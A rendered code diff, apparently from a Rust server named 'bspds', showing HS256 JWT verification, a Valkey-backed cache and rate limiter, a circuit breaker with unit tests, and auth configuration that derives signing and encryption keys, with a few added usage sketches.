.map_err(|e| anyhow!("Signature verification failed: {}", e))?;
131
+
132
let claims_bytes = URL_SAFE_NO_PAD
133
.decode(claims_b64)
134
.context("Base64 decode of claims failed")?;
135
+
136
let claims: Claims =
137
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
138
+
139
let now = Utc::now().timestamp() as usize;
140
if claims.exp < now {
141
return Err(anyhow!("Token expired"));
142
}
143
+
144
if let Some(scopes) = allowed_scopes {
145
let token_scope = claims.scope.as_deref().unwrap_or("");
146
if !scopes.contains(&token_scope) {
147
return Err(anyhow!("Invalid token scope: {}", token_scope));
148
}
149
}
150
+
151
Ok(TokenData { claims })
152
}
153
+
154
fn verify_token_hs256_internal(
155
token: &str,
156
secret: &[u8],
···
161
if parts.len() != 3 {
162
return Err(anyhow!("Invalid token format"));
163
}
164
+
165
let header_b64 = parts[0];
166
let claims_b64 = parts[1];
167
let signature_b64 = parts[2];
168
+
169
let header_bytes = URL_SAFE_NO_PAD
170
.decode(header_b64)
171
.context("Base64 decode of header failed")?;
172
+
173
let header: Header =
174
serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?;
175
+
176
if header.alg != "HS256" {
177
return Err(anyhow!("Expected HS256 algorithm, got {}", header.alg));
178
}
179
+
180
if let Some(expected) = expected_typ {
181
if header.typ != expected {
182
return Err(anyhow!("Invalid token type: expected {}, got {}", expected, header.typ));
183
}
184
}
185
+
186
let signature_bytes = URL_SAFE_NO_PAD
187
.decode(signature_b64)
188
.context("Base64 decode of signature failed")?;
189
+
190
let message = format!("{}.{}", header_b64, claims_b64);
191
+
192
let mut mac = HmacSha256::new_from_slice(secret)
193
.map_err(|e| anyhow!("Invalid secret: {}", e))?;
194
mac.update(message.as_bytes());
195
+
196
let expected_signature = mac.finalize().into_bytes();
197
let is_valid: bool = signature_bytes.ct_eq(&expected_signature).into();
198
+
199
if !is_valid {
200
return Err(anyhow!("Signature verification failed"));
201
}
202
+
203
let claims_bytes = URL_SAFE_NO_PAD
204
.decode(claims_b64)
205
.context("Base64 decode of claims failed")?;
206
+
207
let claims: Claims =
208
serde_json::from_slice(&claims_bytes).context("JSON decode of claims failed")?;
209
+
210
let now = Utc::now().timestamp() as usize;
211
if claims.exp < now {
212
return Err(anyhow!("Token expired"));
213
}
214
+
215
if let Some(scopes) = allowed_scopes {
216
let token_scope = claims.scope.as_deref().unwrap_or("");
217
if !scopes.contains(&token_scope) {
218
return Err(anyhow!("Invalid token scope: {}", token_scope));
219
}
220
}
221
+
222
Ok(TokenData { claims })
223
}
224
+
225
pub fn get_algorithm_from_token(token: &str) -> Result<String, String> {
226
let parts: Vec<&str> = token.split('.').collect();
227
if parts.len() != 3 {
228
return Err("Invalid token format".to_string());
229
}
230
+
231
let header_bytes = URL_SAFE_NO_PAD
232
.decode(parts[0])
233
.map_err(|e| format!("Base64 decode failed: {}", e))?;
234
+
235
let header: Header =
236
serde_json::from_slice(&header_bytes).map_err(|e| format!("JSON decode failed: {}", e))?;
237
+
238
Ok(header.alg)
239
}
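A round-trip sketch (not in the diff) tying the HS256 creation helpers in src/auth/token.rs to the verifiers above; the DID, the secret, and the test module name are arbitrary placeholders.

#[cfg(test)]
mod hs256_roundtrip_sketch {
    use super::*;

    #[test]
    fn access_token_roundtrips_and_scope_is_enforced() {
        let secret = b"an-hs256-test-secret-of-sufficient-length";
        let token = crate::auth::token::create_access_token_hs256("did:plc:example", secret)
            .expect("token creation");

        // Header inspection without verification.
        assert_eq!(get_algorithm_from_token(&token).unwrap(), "HS256");

        // Full verification: signature, expiry, typ, and scope.
        let data = verify_access_token_hs256(&token, secret).expect("valid access token");
        assert_eq!(data.claims.iss, "did:plc:example");

        // Scope check: an access token must not verify as a refresh token.
        assert!(verify_refresh_token_hs256(&token, secret).is_err());
    }
}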
+24
src/cache/mod.rs
···
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
use std::sync::Arc;
4
use std::time::Duration;
5
#[derive(Debug, thiserror::Error)]
6
pub enum CacheError {
7
#[error("Cache connection error: {0}")]
···
9
#[error("Serialization error: {0}")]
10
Serialization(String),
11
}
12
#[async_trait]
13
pub trait Cache: Send + Sync {
14
async fn get(&self, key: &str) -> Option<String>;
···
22
self.set(key, &encoded, ttl).await
23
}
24
}
25
#[derive(Clone)]
26
pub struct ValkeyCache {
27
conn: redis::aio::ConnectionManager,
28
}
29
impl ValkeyCache {
30
pub async fn new(url: &str) -> Result<Self, CacheError> {
31
let client = redis::Client::open(url)
···
36
.map_err(|e| CacheError::Connection(e.to_string()))?;
37
Ok(Self { conn: manager })
38
}
39
pub fn connection(&self) -> redis::aio::ConnectionManager {
40
self.conn.clone()
41
}
42
}
43
#[async_trait]
44
impl Cache for ValkeyCache {
45
async fn get(&self, key: &str) -> Option<String> {
···
51
.ok()
52
.flatten()
53
}
54
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
55
let mut conn = self.conn.clone();
56
redis::cmd("SET")
···
62
.await
63
.map_err(|e| CacheError::Connection(e.to_string()))
64
}
65
async fn delete(&self, key: &str) -> Result<(), CacheError> {
66
let mut conn = self.conn.clone();
67
redis::cmd("DEL")
···
71
.map_err(|e| CacheError::Connection(e.to_string()))
72
}
73
}
74
pub struct NoOpCache;
75
#[async_trait]
76
impl Cache for NoOpCache {
77
async fn get(&self, _key: &str) -> Option<String> {
78
None
79
}
80
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
81
Ok(())
82
}
83
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
84
Ok(())
85
}
86
}
87
#[async_trait]
88
pub trait DistributedRateLimiter: Send + Sync {
89
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
90
}
91
#[derive(Clone)]
92
pub struct RedisRateLimiter {
93
conn: redis::aio::ConnectionManager,
94
}
95
impl RedisRateLimiter {
96
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
97
Self { conn }
98
}
99
}
100
#[async_trait]
101
impl DistributedRateLimiter for RedisRateLimiter {
102
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
124
count <= limit as i64
125
}
126
}
127
pub struct NoOpRateLimiter;
128
#[async_trait]
129
impl DistributedRateLimiter for NoOpRateLimiter {
130
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
131
true
132
}
133
}
134
pub enum CacheBackend {
135
Valkey(ValkeyCache),
136
NoOp,
137
}
138
impl CacheBackend {
139
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
140
match self {
···
145
}
146
}
147
}
148
#[async_trait]
149
impl Cache for CacheBackend {
150
async fn get(&self, key: &str) -> Option<String> {
···
153
CacheBackend::NoOp => None,
154
}
155
}
156
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
157
match self {
158
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
159
CacheBackend::NoOp => Ok(()),
160
}
161
}
162
async fn delete(&self, key: &str) -> Result<(), CacheError> {
163
match self {
164
CacheBackend::Valkey(c) => c.delete(key).await,
···
166
}
167
}
168
}
169
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
170
match std::env::var("VALKEY_URL") {
171
Ok(url) => match ValkeyCache::new(&url).await {
···
2
use base64::{Engine as _, engine::general_purpose::STANDARD as BASE64};
3
use std::sync::Arc;
4
use std::time::Duration;
5
+
6
#[derive(Debug, thiserror::Error)]
7
pub enum CacheError {
8
#[error("Cache connection error: {0}")]
···
10
#[error("Serialization error: {0}")]
11
Serialization(String),
12
}
13
+
14
#[async_trait]
15
pub trait Cache: Send + Sync {
16
async fn get(&self, key: &str) -> Option<String>;
···
24
self.set(key, &encoded, ttl).await
25
}
26
}
27
+
28
#[derive(Clone)]
29
pub struct ValkeyCache {
30
conn: redis::aio::ConnectionManager,
31
}
32
+
33
impl ValkeyCache {
34
pub async fn new(url: &str) -> Result<Self, CacheError> {
35
let client = redis::Client::open(url)
···
40
.map_err(|e| CacheError::Connection(e.to_string()))?;
41
Ok(Self { conn: manager })
42
}
43
+
44
pub fn connection(&self) -> redis::aio::ConnectionManager {
45
self.conn.clone()
46
}
47
}
48
+
49
#[async_trait]
50
impl Cache for ValkeyCache {
51
async fn get(&self, key: &str) -> Option<String> {
···
57
.ok()
58
.flatten()
59
}
60
+
61
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
62
let mut conn = self.conn.clone();
63
redis::cmd("SET")
···
69
.await
70
.map_err(|e| CacheError::Connection(e.to_string()))
71
}
72
+
73
async fn delete(&self, key: &str) -> Result<(), CacheError> {
74
let mut conn = self.conn.clone();
75
redis::cmd("DEL")
···
79
.map_err(|e| CacheError::Connection(e.to_string()))
80
}
81
}
82
+
83
pub struct NoOpCache;
84
+
85
#[async_trait]
86
impl Cache for NoOpCache {
87
async fn get(&self, _key: &str) -> Option<String> {
88
None
89
}
90
+
91
async fn set(&self, _key: &str, _value: &str, _ttl: Duration) -> Result<(), CacheError> {
92
Ok(())
93
}
94
+
95
async fn delete(&self, _key: &str) -> Result<(), CacheError> {
96
Ok(())
97
}
98
}
99
+
100
#[async_trait]
101
pub trait DistributedRateLimiter: Send + Sync {
102
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool;
103
}
104
+
105
#[derive(Clone)]
106
pub struct RedisRateLimiter {
107
conn: redis::aio::ConnectionManager,
108
}
109
+
110
impl RedisRateLimiter {
111
pub fn new(conn: redis::aio::ConnectionManager) -> Self {
112
Self { conn }
113
}
114
}
115
+
116
#[async_trait]
117
impl DistributedRateLimiter for RedisRateLimiter {
118
async fn check_rate_limit(&self, key: &str, limit: u32, window_ms: u64) -> bool {
···
140
count <= limit as i64
141
}
142
}
143
+
144
pub struct NoOpRateLimiter;
145
+
146
#[async_trait]
147
impl DistributedRateLimiter for NoOpRateLimiter {
148
async fn check_rate_limit(&self, _key: &str, _limit: u32, _window_ms: u64) -> bool {
149
true
150
}
151
}
152
+
153
pub enum CacheBackend {
154
Valkey(ValkeyCache),
155
NoOp,
156
}
157
+
158
impl CacheBackend {
159
pub fn rate_limiter(&self) -> Arc<dyn DistributedRateLimiter> {
160
match self {
···
165
}
166
}
167
}
168
+
169
#[async_trait]
170
impl Cache for CacheBackend {
171
async fn get(&self, key: &str) -> Option<String> {
···
174
CacheBackend::NoOp => None,
175
}
176
}
177
+
178
async fn set(&self, key: &str, value: &str, ttl: Duration) -> Result<(), CacheError> {
179
match self {
180
CacheBackend::Valkey(c) => c.set(key, value, ttl).await,
181
CacheBackend::NoOp => Ok(()),
182
}
183
}
184
+
185
async fn delete(&self, key: &str) -> Result<(), CacheError> {
186
match self {
187
CacheBackend::Valkey(c) => c.delete(key).await,
···
189
}
190
}
191
}
192
+
193
pub async fn create_cache() -> (Arc<dyn Cache>, Arc<dyn DistributedRateLimiter>) {
194
match std::env::var("VALKEY_URL") {
195
Ok(url) => match ValkeyCache::new(&url).await {
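A wiring sketch (not in the diff): creating the cache at startup and exercising the trait. The set_bytes signature and the NoOp fallback when VALKEY_URL is unset are inferred from the parts of the file shown above, so treat them as assumptions; the rate-limit numbers are made up.

// Sketch only: startup wiring plus a few trait calls.
async fn cache_wiring_sketch() {
    let (cache, limiter) = create_cache().await;

    // String values via get/set; binary values via the base64-backed byte helpers.
    let _ = cache.set("greeting", "hello", std::time::Duration::from_secs(30)).await;
    let _ = cache.set_bytes("blob", &[0xde, 0xad, 0xbe, 0xef], std::time::Duration::from_secs(30)).await;
    let greeting = cache.get("greeting").await;   // Some("hello") on Valkey, None on NoOp
    let blob = cache.get_bytes("blob").await;     // decoded bytes, or None

    // e.g. 100 requests per 60-second window for this key.
    let allowed = limiter.check_rate_limit("ip:203.0.113.7", 100, 60_000).await;
    let _ = (greeting, blob, allowed);
}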
+45
src/circuit_breaker.rs
···
2
use std::sync::Arc;
3
use std::time::Duration;
4
use tokio::sync::RwLock;
5
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
6
pub enum CircuitState {
7
Closed,
8
Open,
9
HalfOpen,
10
}
11
pub struct CircuitBreaker {
12
name: String,
13
failure_threshold: u32,
···
18
success_count: AtomicU32,
19
last_failure_time: AtomicU64,
20
}
21
impl CircuitBreaker {
22
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
23
Self {
···
31
last_failure_time: AtomicU64::new(0),
32
}
33
}
34
pub async fn can_execute(&self) -> bool {
35
let state = self.state.read().await;
36
match *state {
37
CircuitState::Closed => true,
38
CircuitState::Open => {
···
41
.duration_since(std::time::UNIX_EPOCH)
42
.unwrap()
43
.as_secs();
44
if now - last_failure >= self.timeout.as_secs() {
45
drop(state);
46
let mut state = self.state.write().await;
···
56
CircuitState::HalfOpen => true,
57
}
58
}
59
pub async fn record_success(&self) {
60
let state = *self.state.read().await;
61
match state {
62
CircuitState::Closed => {
63
self.failure_count.store(0, Ordering::SeqCst);
···
75
CircuitState::Open => {}
76
}
77
}
78
pub async fn record_failure(&self) {
79
let state = *self.state.read().await;
80
match state {
81
CircuitState::Closed => {
82
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
110
CircuitState::Open => {}
111
}
112
}
113
pub async fn state(&self) -> CircuitState {
114
*self.state.read().await
115
}
116
pub fn name(&self) -> &str {
117
&self.name
118
}
119
}
120
#[derive(Clone)]
121
pub struct CircuitBreakers {
122
pub plc_directory: Arc<CircuitBreaker>,
123
pub relay_notification: Arc<CircuitBreaker>,
124
}
125
impl Default for CircuitBreakers {
126
fn default() -> Self {
127
Self::new()
128
}
129
}
130
impl CircuitBreakers {
131
pub fn new() -> Self {
132
Self {
···
135
}
136
}
137
}
138
#[derive(Debug)]
139
pub struct CircuitOpenError {
140
pub circuit_name: String,
141
}
142
impl std::fmt::Display for CircuitOpenError {
143
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
144
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
145
}
146
}
147
impl std::error::Error for CircuitOpenError {}
148
pub async fn with_circuit_breaker<T, E, F, Fut>(
149
circuit: &CircuitBreaker,
150
operation: F,
···
158
circuit_name: circuit.name().to_string(),
159
}));
160
}
161
match operation().await {
162
Ok(result) => {
163
circuit.record_success().await;
···
169
}
170
}
171
}
172
#[derive(Debug)]
173
pub enum CircuitBreakerError<E> {
174
CircuitOpen(CircuitOpenError),
175
OperationFailed(E),
176
}
177
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
178
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
179
match self {
···
182
}
183
}
184
}
185
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
186
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
187
match self {
···
190
}
191
}
192
}
193
#[cfg(test)]
194
mod tests {
195
use super::*;
196
#[tokio::test]
197
async fn test_circuit_breaker_starts_closed() {
198
let cb = CircuitBreaker::new("test", 3, 2, 10);
199
assert_eq!(cb.state().await, CircuitState::Closed);
200
assert!(cb.can_execute().await);
201
}
202
#[tokio::test]
203
async fn test_circuit_breaker_opens_after_failures() {
204
let cb = CircuitBreaker::new("test", 3, 2, 10);
205
cb.record_failure().await;
206
assert_eq!(cb.state().await, CircuitState::Closed);
207
cb.record_failure().await;
208
assert_eq!(cb.state().await, CircuitState::Closed);
209
cb.record_failure().await;
210
assert_eq!(cb.state().await, CircuitState::Open);
211
assert!(!cb.can_execute().await);
212
}
213
#[tokio::test]
214
async fn test_circuit_breaker_success_resets_failures() {
215
let cb = CircuitBreaker::new("test", 3, 2, 10);
216
cb.record_failure().await;
217
cb.record_failure().await;
218
cb.record_success().await;
219
cb.record_failure().await;
220
cb.record_failure().await;
221
assert_eq!(cb.state().await, CircuitState::Closed);
222
cb.record_failure().await;
223
assert_eq!(cb.state().await, CircuitState::Open);
224
}
225
#[tokio::test]
226
async fn test_circuit_breaker_half_open_closes_after_successes() {
227
let cb = CircuitBreaker::new("test", 3, 2, 0);
228
for _ in 0..3 {
229
cb.record_failure().await;
230
}
231
assert_eq!(cb.state().await, CircuitState::Open);
232
tokio::time::sleep(Duration::from_millis(100)).await;
233
assert!(cb.can_execute().await);
234
assert_eq!(cb.state().await, CircuitState::HalfOpen);
235
cb.record_success().await;
236
assert_eq!(cb.state().await, CircuitState::HalfOpen);
237
cb.record_success().await;
238
assert_eq!(cb.state().await, CircuitState::Closed);
239
}
240
#[tokio::test]
241
async fn test_circuit_breaker_half_open_reopens_on_failure() {
242
let cb = CircuitBreaker::new("test", 3, 2, 0);
243
for _ in 0..3 {
244
cb.record_failure().await;
245
}
246
tokio::time::sleep(Duration::from_millis(100)).await;
247
cb.can_execute().await;
248
cb.record_failure().await;
249
assert_eq!(cb.state().await, CircuitState::Open);
250
}
251
#[tokio::test]
252
async fn test_with_circuit_breaker_helper() {
253
let cb = CircuitBreaker::new("test", 3, 2, 10);
254
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
255
with_circuit_breaker(&cb, || async { Ok(42) }).await;
256
assert!(result.is_ok());
257
assert_eq!(result.unwrap(), 42);
258
let result: Result<i32, CircuitBreakerError<&str>> =
259
with_circuit_breaker(&cb, || async { Err("error") }).await;
260
assert!(result.is_err());
···
2
use std::sync::Arc;
3
use std::time::Duration;
4
use tokio::sync::RwLock;
5
+
6
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
7
pub enum CircuitState {
8
Closed,
9
Open,
10
HalfOpen,
11
}
12
+
13
pub struct CircuitBreaker {
14
name: String,
15
failure_threshold: u32,
···
20
success_count: AtomicU32,
21
last_failure_time: AtomicU64,
22
}
23
+
24
impl CircuitBreaker {
25
pub fn new(name: &str, failure_threshold: u32, success_threshold: u32, timeout_secs: u64) -> Self {
26
Self {
···
34
last_failure_time: AtomicU64::new(0),
35
}
36
}
37
+
38
pub async fn can_execute(&self) -> bool {
39
let state = self.state.read().await;
40
+
41
match *state {
42
CircuitState::Closed => true,
43
CircuitState::Open => {
···
46
.duration_since(std::time::UNIX_EPOCH)
47
.unwrap()
48
.as_secs();
49
+
50
if now - last_failure >= self.timeout.as_secs() {
51
drop(state);
52
let mut state = self.state.write().await;
···
62
CircuitState::HalfOpen => true,
63
}
64
}
65
+
66
pub async fn record_success(&self) {
67
let state = *self.state.read().await;
68
+
69
match state {
70
CircuitState::Closed => {
71
self.failure_count.store(0, Ordering::SeqCst);
···
83
CircuitState::Open => {}
84
}
85
}
86
+
87
pub async fn record_failure(&self) {
88
let state = *self.state.read().await;
89
+
90
match state {
91
CircuitState::Closed => {
92
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
···
120
CircuitState::Open => {}
121
}
122
}
123
+
124
pub async fn state(&self) -> CircuitState {
125
*self.state.read().await
126
}
127
+
128
pub fn name(&self) -> &str {
129
&self.name
130
}
131
}
132
+
133
#[derive(Clone)]
134
pub struct CircuitBreakers {
135
pub plc_directory: Arc<CircuitBreaker>,
136
pub relay_notification: Arc<CircuitBreaker>,
137
}
138
+
139
impl Default for CircuitBreakers {
140
fn default() -> Self {
141
Self::new()
142
}
143
}
144
+
145
impl CircuitBreakers {
146
pub fn new() -> Self {
147
Self {
···
150
}
151
}
152
}
153
+
154
#[derive(Debug)]
155
pub struct CircuitOpenError {
156
pub circuit_name: String,
157
}
158
+
159
impl std::fmt::Display for CircuitOpenError {
160
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
161
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
162
}
163
}
164
+
165
impl std::error::Error for CircuitOpenError {}
166
+
167
pub async fn with_circuit_breaker<T, E, F, Fut>(
168
circuit: &CircuitBreaker,
169
operation: F,
···
177
circuit_name: circuit.name().to_string(),
178
}));
179
}
180
+
181
match operation().await {
182
Ok(result) => {
183
circuit.record_success().await;
···
189
}
190
}
191
}
192
+
193
#[derive(Debug)]
194
pub enum CircuitBreakerError<E> {
195
CircuitOpen(CircuitOpenError),
196
OperationFailed(E),
197
}
198
+
199
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
200
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
201
match self {
···
204
}
205
}
206
}
207
+
208
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
209
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
210
match self {
···
213
}
214
}
215
}
216
+
217
#[cfg(test)]
218
mod tests {
219
use super::*;
220
+
221
#[tokio::test]
222
async fn test_circuit_breaker_starts_closed() {
223
let cb = CircuitBreaker::new("test", 3, 2, 10);
224
assert_eq!(cb.state().await, CircuitState::Closed);
225
assert!(cb.can_execute().await);
226
}
227
+
228
#[tokio::test]
229
async fn test_circuit_breaker_opens_after_failures() {
230
let cb = CircuitBreaker::new("test", 3, 2, 10);
231
+
232
cb.record_failure().await;
233
assert_eq!(cb.state().await, CircuitState::Closed);
234
+
235
cb.record_failure().await;
236
assert_eq!(cb.state().await, CircuitState::Closed);
237
+
238
cb.record_failure().await;
239
assert_eq!(cb.state().await, CircuitState::Open);
240
assert!(!cb.can_execute().await);
241
}
242
+
243
#[tokio::test]
244
async fn test_circuit_breaker_success_resets_failures() {
245
let cb = CircuitBreaker::new("test", 3, 2, 10);
246
+
247
cb.record_failure().await;
248
cb.record_failure().await;
249
cb.record_success().await;
250
+
251
cb.record_failure().await;
252
cb.record_failure().await;
253
assert_eq!(cb.state().await, CircuitState::Closed);
254
+
255
cb.record_failure().await;
256
assert_eq!(cb.state().await, CircuitState::Open);
257
}
258
+
259
#[tokio::test]
260
async fn test_circuit_breaker_half_open_closes_after_successes() {
261
let cb = CircuitBreaker::new("test", 3, 2, 0);
262
+
263
for _ in 0..3 {
264
cb.record_failure().await;
265
}
266
assert_eq!(cb.state().await, CircuitState::Open);
267
+
268
tokio::time::sleep(Duration::from_millis(100)).await;
269
assert!(cb.can_execute().await);
270
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
272
cb.record_success().await;
273
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
275
cb.record_success().await;
276
assert_eq!(cb.state().await, CircuitState::Closed);
277
}
278
+
279
#[tokio::test]
280
async fn test_circuit_breaker_half_open_reopens_on_failure() {
281
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
283
for _ in 0..3 {
284
cb.record_failure().await;
285
}
286
+
287
tokio::time::sleep(Duration::from_millis(100)).await;
288
cb.can_execute().await;
289
+
290
cb.record_failure().await;
291
assert_eq!(cb.state().await, CircuitState::Open);
292
}
293
+
294
#[tokio::test]
295
async fn test_with_circuit_breaker_helper() {
296
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
298
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
299
with_circuit_breaker(&cb, || async { Ok(42) }).await;
300
assert!(result.is_ok());
301
assert_eq!(result.unwrap(), 42);
302
+
303
let result: Result<i32, CircuitBreakerError<&str>> =
304
with_circuit_breaker(&cb, || async { Err("error") }).await;
305
assert!(result.is_err());
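A caller sketch (not in the diff) for with_circuit_breaker, guarding an outbound PLC directory lookup with the shared plc_directory breaker. The use of reqwest and the URL shape are stand-ins, not something the diff establishes.

// Sketch only: wrap a fallible async call so repeated failures trip the breaker.
async fn resolve_did_guarded(
    breakers: &CircuitBreakers,
    did: &str,
) -> Result<String, CircuitBreakerError<reqwest::Error>> {
    with_circuit_breaker(&breakers.plc_directory, || async {
        reqwest::get(format!("https://plc.directory/{}", did))
            .await?
            .text()
            .await
    })
    .await
}

Callers can then distinguish CircuitBreakerError::CircuitOpen (fail fast, no request sent) from OperationFailed (the request itself failed and was recorded against the breaker).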
+32
src/config.rs
···
8
use p256::ecdsa::SigningKey;
9
use sha2::{Digest, Sha256};
10
use std::sync::OnceLock;
11
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
12
pub const ENCRYPTION_VERSION: i32 = 1;
13
pub struct AuthConfig {
14
jwt_secret: String,
15
dpop_secret: String,
···
20
pub signing_key_y: String,
21
key_encryption_key: [u8; 32],
22
}
23
impl AuthConfig {
24
pub fn init() -> &'static Self {
25
CONFIG.get_or_init(|| {
···
33
);
34
}
35
});
36
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
37
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
38
"test-dpop-secret-not-for-production".to_string()
···
43
);
44
}
45
});
46
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
47
panic!("JWT_SECRET must be at least 32 characters");
48
}
49
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
50
panic!("DPOP_SECRET must be at least 32 characters");
51
}
52
let mut hasher = Sha256::new();
53
hasher.update(b"oauth-signing-key-derivation:");
54
hasher.update(jwt_secret.as_bytes());
55
let seed = hasher.finalize();
56
let signing_key = SigningKey::from_slice(&seed)
57
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
58
let verifying_key = signing_key.verifying_key();
59
let point = verifying_key.to_encoded_point(false);
60
let signing_key_x = URL_SAFE_NO_PAD.encode(
61
point.x().expect("EC point missing X coordinate - this should never happen")
62
);
63
let signing_key_y = URL_SAFE_NO_PAD.encode(
64
point.y().expect("EC point missing Y coordinate - this should never happen")
65
);
66
let mut kid_hasher = Sha256::new();
67
kid_hasher.update(signing_key_x.as_bytes());
68
kid_hasher.update(signing_key_y.as_bytes());
69
let kid_hash = kid_hasher.finalize();
70
let signing_key_id = URL_SAFE_NO_PAD.encode(&kid_hash[..8]);
71
let master_key = std::env::var("MASTER_KEY").unwrap_or_else(|_| {
72
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
73
"test-master-key-not-for-production".to_string()
···
78
);
79
}
80
});
81
if master_key.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
82
panic!("MASTER_KEY must be at least 32 characters");
83
}
84
let hk = Hkdf::<Sha256>::new(None, master_key.as_bytes());
85
let mut key_encryption_key = [0u8; 32];
86
hk.expand(b"bspds-user-key-encryption", &mut key_encryption_key)
87
.expect("HKDF expansion failed");
88
AuthConfig {
89
jwt_secret,
90
dpop_secret,
···
96
}
97
})
98
}
99
pub fn get() -> &'static Self {
100
CONFIG.get().expect("AuthConfig not initialized - call AuthConfig::init() first")
101
}
102
pub fn jwt_secret(&self) -> &str {
103
&self.jwt_secret
104
}
105
pub fn dpop_secret(&self) -> &str {
106
&self.dpop_secret
107
}
108
pub fn encrypt_user_key(&self, plaintext: &[u8]) -> Result<Vec<u8>, String> {
109
use rand::RngCore;
110
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
111
.map_err(|e| format!("Failed to create cipher: {}", e))?;
112
let mut nonce_bytes = [0u8; 12];
113
rand::thread_rng().fill_bytes(&mut nonce_bytes);
114
#[allow(deprecated)]
115
let nonce = Nonce::from_slice(&nonce_bytes);
116
let ciphertext = cipher
117
.encrypt(nonce, plaintext)
118
.map_err(|e| format!("Encryption failed: {}", e))?;
119
let mut result = Vec::with_capacity(12 + ciphertext.len());
120
result.extend_from_slice(&nonce_bytes);
121
result.extend_from_slice(&ciphertext);
122
Ok(result)
123
}
124
pub fn decrypt_user_key(&self, encrypted: &[u8]) -> Result<Vec<u8>, String> {
125
if encrypted.len() < 12 {
126
return Err("Encrypted data too short".to_string());
127
}
128
let cipher = Aes256Gcm::new_from_slice(&self.key_encryption_key)
129
.map_err(|e| format!("Failed to create cipher: {}", e))?;
130
#[allow(deprecated)]
131
let nonce = Nonce::from_slice(&encrypted[..12]);
132
let ciphertext = &encrypted[12..];
133
cipher
134
.decrypt(nonce, ciphertext)
135
.map_err(|e| format!("Decryption failed: {}", e))
136
}
137
}
138
pub fn encrypt_key(plaintext: &[u8]) -> Result<Vec<u8>, String> {
139
AuthConfig::get().encrypt_user_key(plaintext)
140
}
141
pub fn decrypt_key(encrypted: &[u8], version: Option<i32>) -> Result<Vec<u8>, String> {
142
match version.unwrap_or(0) {
143
0 => Ok(encrypted.to_vec()),
···
8
use p256::ecdsa::SigningKey;
9
use sha2::{Digest, Sha256};
10
use std::sync::OnceLock;
11
+
12
static CONFIG: OnceLock<AuthConfig> = OnceLock::new();
13
+
14
pub const ENCRYPTION_VERSION: i32 = 1;
15
+
16
pub struct AuthConfig {
17
jwt_secret: String,
18
dpop_secret: String,
···
23
pub signing_key_y: String,
24
key_encryption_key: [u8; 32],
25
}
26
+
27
impl AuthConfig {
28
pub fn init() -> &'static Self {
29
CONFIG.get_or_init(|| {
···
37
);
38
}
39
});
40
+
41
let dpop_secret = std::env::var("DPOP_SECRET").unwrap_or_else(|_| {
42
if cfg!(test) || std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_ok() {
43
"test-dpop-secret-not-for-production".to_string()
···
48
);
49
}
50
});
51
+
52
if jwt_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
53
panic!("JWT_SECRET must be at least 32 characters");
54
}
55
+
56
if dpop_secret.len() < 32 && std::env::var("BSPDS_ALLOW_INSECURE_SECRETS").is_err() {
57
panic!("DPOP_SECRET must be at least 32 characters");
58
}
59
+
60
let mut hasher = Sha256::new();
61
hasher.update(b"oauth-signing-key-derivation:");
62
hasher.update(jwt_secret.as_bytes());
63
let seed = hasher.finalize();
64
+
65
let signing_key = SigningKey::from_slice(&seed)
66
.unwrap_or_else(|e| panic!("Failed to create signing key from seed: {}. This is a bug.", e));
67
+
68
let verifying_key = signing_key.verifying_key();
69
